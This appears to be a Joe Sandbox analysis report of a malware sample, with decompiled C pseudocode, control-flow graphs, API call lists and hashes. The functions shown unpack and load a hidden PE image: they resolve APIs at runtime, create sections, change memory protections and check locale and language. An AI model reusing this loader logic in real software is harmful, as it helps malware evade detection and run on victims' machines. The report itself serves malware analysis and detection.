                              0x004012a9
                              0x004012af
                              0x004012b5
                              0x004012ba
                              0x004012bf
                              0x004012c4
                              0x00000000
                              0x004012c6
                              0x004012c9
                              0x004012c9
                              0x004012c4
                              0x004012a7
                              0x00401291
                              0x0040127b
                              0x00401265
                              0x0040124f
                              0x004012e3

                              APIs
                                • Part of subcall function 004012E6: HeapAlloc.KERNEL32(00000000,?,00401A18,00000030,?,00000000), ref: 004012F2
                              • GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,00401337,?,?,?,?,?,00000002,?,?), ref: 00401226
                              • GetProcAddress.KERNEL32(00000000,?), ref: 00401248
                              • GetProcAddress.KERNEL32(00000000,?), ref: 0040125E
                              • GetProcAddress.KERNEL32(00000000,?), ref: 00401274
                              • GetProcAddress.KERNEL32(00000000,?), ref: 0040128A
                              • GetProcAddress.KERNEL32(00000000,?), ref: 004012A0
                                • Part of subcall function 0040110B: NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,77294EE0,00000000,00000000,?), ref: 00401168
                                • Part of subcall function 0040110B: memset.NTDLL ref: 0040118A
                              Memory Dump Source
                              • Source File: 00000000.00000002.508788787.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.508788787.0000000000403000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.508788787.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.508788787.0000000000407000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_KOYCdGz80D.jbxd
                              Similarity
                              • API ID: AddressProc$AllocCreateHandleHeapModuleSectionmemset
                              • String ID:
                              • API String ID: 1632424568-0
                              • Opcode ID: ef3fb27e8fef4e2a0636531737cea3558674998f5155fbc55e035b1692bada1c
                              • Instruction ID: f32f865edd81f5c961b11f374a2ae16c892bfa44bfba4a474c1bfb8eea8db87f
                              • Opcode Fuzzy Hash: ef3fb27e8fef4e2a0636531737cea3558674998f5155fbc55e035b1692bada1c
                              • Instruction Fuzzy Hash: 7C210CB4A0060BAFD710DFA9CD4495B77ECEB54314700447AEA09FB261EB74E9008B68
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00401DE1 Relevance: 7.5, APIs: 5, Instructions: 19memoryCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              C-Code - Quality: 100%
                              			_entry_() {
				void* _t1;
				int _t4;
				int _t6;

				_t6 = 0;
				_t1 = HeapCreate(0, 0x400000, 0); // executed
				 *0x404160 = _t1;
				if(_t1 != 0) {
					 *0x404170 = GetModuleHandleA(0);
					GetCommandLineW(); // executed
					_t4 = E004019F1(); // executed
					_t6 = _t4;
					HeapDestroy( *0x404160);
				}
				ExitProcess(_t6);
			}






                              0x00401de2
                              0x00401deb
                              0x00401df1
                              0x00401df8
                              0x00401e01
                              0x00401e06
                              0x00401e0c
                              0x00401e17
                              0x00401e19
                              0x00401e19
                              0x00401e20

                              APIs
                              • HeapCreate.KERNEL32(00000000,00400000,00000000), ref: 00401DEB
                              • GetModuleHandleA.KERNEL32(00000000), ref: 00401DFB
                              • GetCommandLineW.KERNEL32 ref: 00401E06
                                • Part of subcall function 004019F1: NtQuerySystemInformation.NTDLL ref: 00401A26
                                • Part of subcall function 004019F1: Sleep.KERNEL32(00000000,00000000,00000030,?,00000000), ref: 00401A6D
                                • Part of subcall function 004019F1: GetLocaleInfoA.KERNEL32(00000400,0000005A,?,00000004,?,00000000), ref: 00401A95
                                • Part of subcall function 004019F1: GetSystemDefaultUILanguage.KERNEL32(?,00000000), ref: 00401A9F
                                • Part of subcall function 004019F1: VerLanguageNameA.KERNEL32(?,?,00000004,?,00000000), ref: 00401AB2
                                • Part of subcall function 004019F1: GetLongPathNameW.KERNEL32(?,00000000,00000000), ref: 00401ADF
                                • Part of subcall function 004019F1: GetLongPathNameW.KERNEL32(?,00000000,00000000), ref: 00401AFD
                              • HeapDestroy.KERNEL32 ref: 00401E19
                              • ExitProcess.KERNEL32 ref: 00401E20
                              Memory Dump Source
                              • Source File: 00000000.00000002.508788787.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.508788787.0000000000403000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.508788787.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.508788787.0000000000407000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_KOYCdGz80D.jbxd
                              Similarity
                              • API ID: Name$HeapLanguageLongPathSystem$CommandCreateDefaultDestroyExitHandleInfoInformationLineLocaleModuleProcessQuerySleep
                              • String ID:
                              • API String ID: 1863574965-0
                              • Opcode ID: 3f0d5e8033645e4078616d0e82c2d440b95647ac6ba795ba13239d20948eddaa
                              • Instruction ID: 5d9c3f05f0f46dd7afa9dd855db83e90556071015df760abc973ca805bcb04d9
                              • Opcode Fuzzy Hash: 3f0d5e8033645e4078616d0e82c2d440b95647ac6ba795ba13239d20948eddaa
                              • Instruction Fuzzy Hash: 0BE0B6B1403220ABC7116F71BE0CA4F7E28BB89B527000539FA05F2279CB384A41CADC
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 004014CF Relevance: 4.6, APIs: 3, Instructions: 68memoryCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 92 4014cf-401512 VirtualProtect 93 4015a6-4015ad 92->93 94 401518-40151c 92->94 94->93 95 401522-40152c 94->95 96 40154a-401554 95->96 97 40152e-401538 95->97 100 401556-401566 96->100 101 401568 96->101 98 401542-401548 97->98 99 40153a-401540 97->99 102 40156e-401581 VirtualProtect 98->102 99->102 100->101 100->102 101->102 103 401583-401589 GetLastError 102->103 104 40158c-4015a0 102->104 103->104 104->93 104->94
                              C-Code - Quality: 87%
                              			E004014CF(void* __eax, void* _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				long _v20;
				int _t42;
				long _t53;
				intOrPtr _t56;
				void* _t57;
				signed int _t59;

				_v12 = _v12 & 0x00000000;
				_t56 =  *0x404180;
				_t57 = ( *(__eax + 0x14) & 0x0000ffff) + __eax + 0x18;
				_v16 =  *(__eax + 6) & 0x0000ffff;
				VirtualProtect(_a4,  *(__eax + 0x54), _t56 - 0x43175abf,  &_v20); // executed
				_v8 = _v8 & 0x00000000;
				if(_v16 <= 0) {
					L12:
					return _v12;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t59 = _v12;
					if(_t59 != 0) {
						goto L12;
					}
					asm("bt [esi+0x24], eax");
					if(_t59 >= 0) {
						asm("bt [esi+0x24], eax");
						if(__eflags >= 0) {
							L8:
							_t53 = _t56 - 0x43175abf;
							L9:
							_t42 = VirtualProtect( *((intOrPtr*)(_t57 + 0xc)) + _a4,  *(_t57 + 8), _t53,  &_v20); // executed
							if(_t42 == 0) {
								_v12 = GetLastError();
							}
							_t57 = _t57 + (_t56 - 0x3175ac2) * 0x28;
							_v8 = _v8 + 1;
							if(_v8 < _v16) {
								continue;
							} else {
								goto L12;
							}
						}
						asm("bt [esi+0x24], eax");
						_t53 = _t56 - 0x43175ac1;
						if(__eflags >= 0) {
							goto L9;
						}
						goto L8;
					}
					asm("bt [esi+0x24], eax");
					if(_t59 >= 0) {
						_t53 = _t56 - 0x43175aa3;
					} else {
						_t53 = _t56 - 0x43175a83;
					}
					goto L9;
				}
				goto L12;
			}












                              0x004014d9
                              0x004014e6
                              0x004014ec
                              0x004014f8
                              0x00401508
                              0x0040150a
                              0x00401512
                              0x004015a6
                              0x004015ad
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00401518
                              0x00401518
                              0x00401518
                              0x0040151c
                              0x00000000
                              0x00000000
                              0x00401528
                              0x0040152c
                              0x00401550
                              0x00401554
                              0x00401568
                              0x00401568
                              0x0040156e
                              0x0040157d
                              0x00401581
                              0x00401589
                              0x00401589
                              0x00401595
                              0x00401597
                              0x004015a0
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x004015a0
                              0x0040155c
                              0x00401560
                              0x00401566
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00401566
                              0x00401534
                              0x00401538
                              0x00401542
                              0x0040153a
                              0x0040153a
                              0x0040153a
                              0x00000000
                              0x00401538
                              0x00000000

                              APIs
                              • VirtualProtect.KERNEL32(00000000,?,?,?,?,?,00000000,?,?), ref: 00401508
                              • VirtualProtect.KERNEL32(00000000,?,?,?), ref: 0040157D
                              • GetLastError.KERNEL32 ref: 00401583
                              Memory Dump Source
                              • Source File: 00000000.00000002.508788787.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.508788787.0000000000403000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.508788787.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.508788787.0000000000407000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_KOYCdGz80D.jbxd
                              Similarity
                              • API ID: ProtectVirtual$ErrorLast
                              • String ID:
                              • API String ID: 1469625949-0
                              • Opcode ID: fa1f72f039ba5afec073a1f2adf273f2725f5d9d4501c0cfce72b6ba3d5ab017
                              • Instruction ID: db8870d9979c58085381c8b0541bfb0d1fdb36fbc34c572f0fe0e58abbf4653c
                              • Opcode Fuzzy Hash: fa1f72f039ba5afec073a1f2adf273f2725f5d9d4501c0cfce72b6ba3d5ab017
                              • Instruction Fuzzy Hash: D1212B7280121AEFCB14CF95C9819AAF7B4FF58305F04487AE413AB960E738AA55CF58
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0040F577 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 129COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 105 40f577-40f590 call 410330 108 40f592-40f595 105->108 109 40f5aa-40f5ae 105->109 112 40f62b-40f62d 108->112 110 40f5b0-40f5c5 109->110 111 40f59a-40f59c 109->111 110->108 116 40f5c7-40f5ce 110->116 113 40f59e 111->113 114 40f59f-40f5a6 111->114 113->114 114->109 118 40f603-40f606 116->118 119 40f5d0-40f5dd 118->119 120 40f608-40f627 118->120 124 40f601 119->124 125 40f5df-40f5e1 119->125 123 40f629-40f62a 120->123 123->112 124->118 126 40f5e7-40f5ed 125->126 127 40f62e-40f643 126->127 128 40f5ef-40f5fc 126->128 127->123 131 40f645-40f66f 128->131 132 40f5fe 128->132 135 40f671-40f678 131->135 136 40f67a 131->136 132->124 135->136 137 40f67d-40f680 136->137 138 40f692-40f696 137->138 139 40f682-40f690 137->139 141 40f6a0-40f6af call 415408 138->141 142 40f698-40f69d 138->142 140 40f6ce-40f6d2 139->140 140->137 143 40f6d4-40f6d7 140->143 150 40f6b1-40f6b7 141->150 151 40f6c4-40f6cc 141->151 142->141 145 40f6d9-40f6dc 143->145 146 40f6de-40f6e0 143->146 145->137 145->146 148 40f6e2 146->148 149 40f6e6 146->149 148->149 152 40f6ea-40f6ed 149->152 153 40f6c3 150->153 154 40f6b9-40f6c1 150->154 151->140 155 40f700-40f701 151->155 156 40f6f3-40f6f7 152->156 157 40f7dc-40f7e3 152->157 153->151 154->153 155->149 158 40f6f9-40f6fb 156->158 159 40f6fd-40f6fe 156->159 160 40f7e5 157->160 161 40f7e8-40f7eb 157->161 158->159 162 40f703-40f706 158->162 159->156 160->161 162->157 163 40f70c-40f710 162->163 164 40f712-40f719 163->164 165 40f71b 163->165 164->165 166 40f71d-40f722 165->166 167 40f726-40f729 166->167 168 40f724-40f725 167->168 169 40f72b-40f72e 167->169 168->167 170 40f730-40f733 169->170 171 40f756-40f758 169->171 172 40f754 170->172 173 40f735-40f739 170->173 174 40f75a-40f75d 171->174 175 40f76c-40f770 171->175 172->171 176 40f747-40f751 173->176 177 40f73b-40f741 173->177 178 40f763-40f767 174->178 179 40f75f-40f762 174->179 180 40f772-40f776 175->180 181 40f7c7-40f7c9 175->181 176->172 177->176 182 40f743-40f745 177->182 178->174 183 40f769 178->183 179->178 184 40f780-40f782 180->184 185 40f778-40f77a 180->185 186 40f7d2-40f7d7 181->186 187 40f7cb-40f7cf 181->187 182->172 183->175 189 40f7c1-40f7c2 184->189 190 40f784-40f78a 184->190 185->181 188 40f77c-40f77e 185->188 186->152 187->186 188->181 188->184 189->166 191 40f78c-40f794 call 415408 190->191 192 40f7af-40f7b7 call 415408 190->192 197 40f7a3-40f7ad 191->197 198 40f796-40f7a1 191->198 199 40f7b9-40f7ba 192->199 200 40f7bc-40f7be 192->200 197->200 198->197 199->200 200->189
                              APIs
                              • ___initmbctable.LIBCMT ref: 0040F57F
                                • Part of subcall function 00410330: __setmbcp.LIBCMT ref: 0041033B
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.508875869.000000000040F000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040F000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_40f000_KOYCdGz80D.jbxd
                              Similarity
                              • API ID: ___initmbctable__setmbcp
                              • String ID:
                              • API String ID: 2112888233-3916222277
                              • Opcode ID: 13b57d355ead5208466570ce3bd0ef6d780d2cef623c761a41912572233d60ec
                              • Instruction ID: 32802e6fd101e20215143aa56c30afa4b848c758b3732dc502c36603c15324ef
                              • Opcode Fuzzy Hash: 13b57d355ead5208466570ce3bd0ef6d780d2cef623c761a41912572233d60ec
                              • Instruction Fuzzy Hash: F9410672819204AFEB314F249C047977B94AF55328F24493BE440A36E2E77E4C4AC75D
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0040139F Relevance: 3.1, APIs: 2, Instructions: 60stringthreadCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 229 40139f-4013b6 230 4013c0 229->230 231 4013b8-4013be 229->231 232 4013c6-4013f3 call 401d3c call 401882 230->232 231->232 237 4013f5-40141a lstrlenW call 4015b0 232->237 238 40144e-401450 232->238 242 401443-401447 call 4012fb 237->242 243 40141c-40142e 237->243 240 401451-401452 ExitThread 238->240 248 40144c 242->248 244 401430-40143b call 401fe6 243->244 245 40143d-40143f 243->245 244->242 245->242 248->240
                              C-Code - Quality: 100%
                              			E0040139F() {
				char _v16;
				intOrPtr _v28;
				void _v32;
				void* _v36;
				intOrPtr _t15;
				void* _t16;
				long _t25;
				int _t26;
				void* _t30;
				intOrPtr* _t32;
				signed int _t35;
				intOrPtr _t38;

				_t15 =  *0x404184;
				if( *0x40416c > 5) {
					_t16 = _t15 + 0x40513c;
				} else {
					_t16 = _t15 + 0x40529c;
				}
				E00401D3C(_t16, _t16);
				_t35 = 6;
				memset( &_v32, 0, _t35 << 2);
				if(E00401882( &_v32,  &_v16,  *0x404180 ^ 0xdd0210cf) == 0) {
					_t25 = 0xb;
				} else {
					_t26 = lstrlenW( *0x404178);
					_t8 = _t26 + 2; // 0x2
					_t11 = _t26 + _t8 + 8; // 0xa
					_t30 = E004015B0(_t38, _t11,  &_v32,  &_v36); // executed
					if(_t30 == 0) {
						_t32 = _v36;
						 *_t32 = 0;
						if( *0x404178 == 0) {
							 *((short*)(_t32 + 4)) = 0;
						} else {
							L00401FE6(_t32 + 4);
						}
					}
					_t25 = E004012FB(_v28); // executed
				}
				ExitThread(_t25);
			}















                              0x004013a5
                              0x004013b6
                              0x004013c0
                              0x004013b8
                              0x004013b8
                              0x004013b8
                              0x004013c7
                              0x004013d0
                              0x004013d5
                              0x004013f3
                              0x00401450
                              0x004013f5
                              0x004013fb
                              0x00401401
                              0x0040140f
                              0x00401413
                              0x0040141a
                              0x00401422
                              0x00401426
                              0x0040142e
                              0x0040143f
                              0x00401430
                              0x00401436
                              0x00401436
                              0x0040142e
                              0x00401447
                              0x00401447
                              0x00401452

                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.508788787.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.508788787.0000000000403000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.508788787.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.508788787.0000000000407000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_KOYCdGz80D.jbxd
                              Similarity
                              • API ID: ExitThreadlstrlen
                              • String ID:
                              • API String ID: 2636182767-0
                              • Opcode ID: ac67e65bd4c915eb781d54c6f39458c359880d29bbf57a3e932865a973960b97
                              • Instruction ID: 2b8b17c81bcefa181eed95ac27ced154ec6146dfe98fb58ff2424010aaaeeb75
                              • Opcode Fuzzy Hash: ac67e65bd4c915eb781d54c6f39458c359880d29bbf57a3e932865a973960b97
                              • Instruction Fuzzy Hash: A511E271504205ABE700EB61DD48E5B77ECAF84314F00493BB941F72B1EB38EA448B5A
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00410A56 Relevance: 1.6, APIs: 1, Instructions: 52memoryCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 263 410a56-410a60 264 410a62-410a6c 263->264 265 410a7d-410a86 263->265 264->265 266 410a6e-410a7c 264->266 267 410a89-410a8e 265->267 268 410a88 265->268 269 410a90-410aa1 RtlAllocateHeap 267->269 270 410aa3-410aaa 267->270 268->267 269->270 271 410ad5-410ad7 269->271 272 410ac8-410acd 270->272 273 410aac-410ab5 270->273 272->271 275 410acf 272->275 273->267 277 410ab7-410abc 273->277 275->271 278 410ac4-410ac6 277->278 279 410abe 277->279 278->271 279->278
                              APIs
                              • RtlAllocateHeap.NTDLL(00000008,?), ref: 00410A99
                              Memory Dump Source
                              • Source File: 00000000.00000002.508875869.000000000040F000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040F000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_40f000_KOYCdGz80D.jbxd
                              Similarity
                              • API ID: AllocateHeap
                              • String ID:
                              • API String ID: 1279760036-0
                              • Opcode ID: 085a2ffcf632aa846f97b920b1df5931ac8e3f3f4561082f58ae9c69a235633e
                              • Instruction ID: 0aa57e0648e8c8df9708a4585344eed50b0daa2b7df8248989eb3df6a72410ca
                              • Opcode Fuzzy Hash: 085a2ffcf632aa846f97b920b1df5931ac8e3f3f4561082f58ae9c69a235633e
                              • Instruction Fuzzy Hash: F901B1322013159BEB289F65DC44BA73768AFA17A1F05852BE8559A2D0DBB89CC0C788
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00401D3C Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                              Download Yara Rule

                              Control-flow Graph

                              C-Code - Quality: 37%
                              			E00401D3C(void* __eax, intOrPtr _a4) {

				 *0x404190 =  *0x404190 & 0x00000000;
				_push(0);
				_push(0x40418c);
				_push(1);
				_push(_a4);
				 *0x404188 = 0xc; // executed
				L00401682(); // executed
				return __eax;
			}



                              0x00401d3c
                              0x00401d43
                              0x00401d45
                              0x00401d4a
                              0x00401d4c
                              0x00401d50
                              0x00401d5a
                              0x00401d5f

                              APIs
                              • ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(004013CC,00000001,0040418C,00000000), ref: 00401D5A
                              Memory Dump Source
                              • Source File: 00000000.00000002.508788787.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.508788787.0000000000403000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.508788787.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.508788787.0000000000407000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_KOYCdGz80D.jbxd
                              Similarity
                              • API ID: DescriptorSecurity$ConvertString
                              • String ID:
                              • API String ID: 3907675253-0
                              • Opcode ID: d44a2a0f54f5e6775fd6c1e8a7c4d446c5909fbbc7626a237563b1b511256517
                              • Instruction ID: 8b1a9882f0f7b6f5a619b3d6300b2bdd32795284b236dc0e31706888a106ff8d
                              • Opcode Fuzzy Hash: d44a2a0f54f5e6775fd6c1e8a7c4d446c5909fbbc7626a237563b1b511256517
                              • Instruction Fuzzy Hash: AFC04CF4140300B7E620AB409D5AF057A5577A4715F61062DFB04391E1C3F91094952D
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 004012FB Relevance: 1.3, APIs: 1, Instructions: 70COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 285 4012fb-401339 call 401202 288 401395-401397 285->288 289 40133b-401349 call 401bc4 285->289 291 401398-40139e 288->291 293 401381-401393 call 401ba9 289->293 294 40134b-40135a call 401000 289->294 293->291 294->293 298 40135c-40135f call 4014cf 294->298 301 401364-401368 298->301 301->293 303 40136a-401377 301->303 303->293 306 401379-40137f GetLastError 303->306 306->293
                              C-Code - Quality: 86%
                              			E004012FB(void* __eax) {
				char _v8;
				void* _v12;
				void* __edi;
				void* _t18;
				long _t24;
				long _t26;
				long _t29;
				intOrPtr _t40;
				void* _t41;
				intOrPtr* _t42;
				void* _t44;

				_t41 = __eax;
				_t16 =  *0x404180;
				_t33 =  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x404180 - 0x43174ac4 &  !( *0x404180 - 0x43174ac4);
				_t18 = E00401202( *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x404180 - 0x43174ac4 &  !( *0x404180 - 0x43174ac4),  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x404180 - 0x43174ac4 &  !( *0x404180 - 0x43174ac4), _t16 + 0xbce8a57d,  &_v8,  &_v12); // executed
				if(_t18 != 0) {
					_t29 = 8;
					goto L8;
				} else {
					_t40 = _v8;
					_t29 = E00401BC4(_t33, _t40, _t41);
					if(_t29 == 0) {
						_t44 =  *((intOrPtr*)(_t40 + 0x3c)) + _t40;
						_t24 = E00401000(_t40, _t44); // executed
						_t29 = _t24;
						if(_t29 == 0) {
							_t26 = E004014CF(_t44, _t40); // executed
							_t29 = _t26;
							if(_t29 == 0) {
								_push(_t26);
								_push(1);
								_push(_t40);
								if( *((intOrPtr*)( *((intOrPtr*)(_t44 + 0x28)) + _t40))() == 0) {
									_t29 = GetLastError();
								}
							}
						}
					}
					_t42 = _v12;
					 *((intOrPtr*)(_t42 + 0x18))( *((intOrPtr*)(_t42 + 0x1c))( *_t42));
					E00401BA9(_t42);
					L8:
					return _t29;
				}
			}














                              0x00401303
                              0x00401305
                              0x00401321
                              0x00401332
                              0x00401339
                              0x00401397
                              0x00000000
                              0x0040133b
                              0x0040133b
                              0x00401345
                              0x00401349
                              0x0040134e
                              0x00401351
                              0x00401356
                              0x0040135a
                              0x0040135f
                              0x00401364
                              0x00401368
                              0x0040136d
                              0x0040136e
                              0x00401372
                              0x00401377
                              0x0040137f
                              0x0040137f
                              0x00401377
                              0x00401368
                              0x0040135a
                              0x00401381
                              0x0040138a
                              0x0040138e
                              0x00401398
                              0x0040139e
                              0x0040139e

                              APIs
                                • Part of subcall function 00401202: GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,00401337,?,?,?,?,?,00000002,?,?), ref: 00401226
                                • Part of subcall function 00401202: GetProcAddress.KERNEL32(00000000,?), ref: 00401248
                                • Part of subcall function 00401202: GetProcAddress.KERNEL32(00000000,?), ref: 0040125E
                                • Part of subcall function 00401202: GetProcAddress.KERNEL32(00000000,?), ref: 00401274
                                • Part of subcall function 00401202: GetProcAddress.KERNEL32(00000000,?), ref: 0040128A
                                • Part of subcall function 00401202: GetProcAddress.KERNEL32(00000000,?), ref: 004012A0
                                • Part of subcall function 00401000: LoadLibraryA.KERNEL32(?,?,00000000,?,?), ref: 00401038
                                • Part of subcall function 004014CF: VirtualProtect.KERNEL32(00000000,?,?,?,?,?,00000000,?,?), ref: 00401508
                                • Part of subcall function 004014CF: VirtualProtect.KERNEL32(00000000,?,?,?), ref: 0040157D
                                • Part of subcall function 004014CF: GetLastError.KERNEL32 ref: 00401583
                              • GetLastError.KERNEL32(?,?), ref: 00401379
                              Memory Dump Source
                              • Source File: 00000000.00000002.508788787.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.508788787.0000000000403000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.508788787.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.508788787.0000000000407000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_KOYCdGz80D.jbxd
                              Similarity
                              • API ID: AddressProc$ErrorLastProtectVirtual$HandleLibraryLoadModule
                              • String ID:
                              • API String ID: 3135819546-0
                              • Opcode ID: 336f5482e3aed059344eafb9dfd841dc67045812ccfd429b7a3489f36f6440d7
                              • Instruction ID: 9c7335bcc5d41c3ee7976e84fb0b4f56712358cbe666051dfec51b4dde3629c0
                              • Opcode Fuzzy Hash: 336f5482e3aed059344eafb9dfd841dc67045812ccfd429b7a3489f36f6440d7
                              • Instruction Fuzzy Hash: 8B11E976600301ABD711ABA68C85DAB77BCAF98318704017EFD01B7A91EA74ED068798
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00825364 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 307 825364-82539e call 825677 310 8253a0-8253d3 VirtualAlloc call 8253f1 307->310 311 8253ec 307->311 313 8253d8-8253ea 310->313 311->311 313->311
                              APIs
                              • VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 008253B5
                              Memory Dump Source
                              • Source File: 00000000.00000002.509300056.0000000000820000.00000040.00000020.00020000.00000000.sdmp, Offset: 00820000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_820000_KOYCdGz80D.jbxd
                              Yara matches
                              Similarity
                              • API ID: AllocVirtual
                              • String ID:
                              • API String ID: 4275171209-0
                              • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                              • Instruction ID: eaa307df7732ac1870f735256a974545619732eac4958390d126d4f0db00d674
                              • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                              • Instruction Fuzzy Hash: F2112B79A40208EFDB01DF98C989E99BBF5EF08751F058094F9489B362D371EA90DF80
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Non-executed Functions

                              Function 00401D68 Relevance: 6.0, APIs: 4, Instructions: 40COMMON
                              Download Yara Rule
                              C-Code - Quality: 100%
                              			E00401D68() {
				void* _t1;
				unsigned int _t3;
				void* _t4;
				long _t5;
				void* _t6;
				intOrPtr _t10;
				void* _t14;

				_t10 =  *0x404170;
				_t1 = CreateEventA(0, 1, 0, 0);
				 *0x40417c = _t1;
				if(_t1 == 0) {
					return GetLastError();
				}
				_t3 = GetVersion();
				if(_t3 != 5) {
					L4:
					if(_t14 <= 0) {
						_t4 = 0x32;
						return _t4;
					} else {
						goto L5;
					}
				} else {
					if(_t3 >> 8 > 0) {
						L5:
						 *0x40416c = _t3;
						_t5 = GetCurrentProcessId();
						 *0x404168 = _t5;
						 *0x404170 = _t10;
						_t6 = OpenProcess(0x10047a, 0, _t5);
						 *0x404164 = _t6;
						if(_t6 == 0) {
							 *0x404164 =  *0x404164 | 0xffffffff;
						}
						return 0;
					} else {
						_t14 = _t3 - _t3;
						goto L4;
					}
				}
			}










                              0x00401d69
                              0x00401d77
                              0x00401d7d
                              0x00401d84
                              0x00401ddb
                              0x00401ddb
                              0x00401d86
                              0x00401d8e
                              0x00401d9b
                              0x00401d9b
                              0x00401dd7
                              0x00401dd9
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00401d90
                              0x00401d97
                              0x00401d9d
                              0x00401d9d
                              0x00401da2
                              0x00401db0
                              0x00401db5
                              0x00401dbb
                              0x00401dc1
                              0x00401dc8
                              0x00401dca
                              0x00401dca
                              0x00401dd4
                              0x00401d99
                              0x00401d99
                              0x00000000
                              0x00401d99
                              0x00401d97

                              APIs
                              • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,004019FC), ref: 00401D77
                              • GetVersion.KERNEL32 ref: 00401D86
                              • GetCurrentProcessId.KERNEL32 ref: 00401DA2
                              • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 00401DBB
                              Memory Dump Source
                              • Source File: 00000000.00000002.508788787.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.508788787.0000000000403000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.508788787.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.508788787.0000000000407000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_KOYCdGz80D.jbxd
                              Similarity
                              • API ID: Process$CreateCurrentEventOpenVersion
                              • String ID:
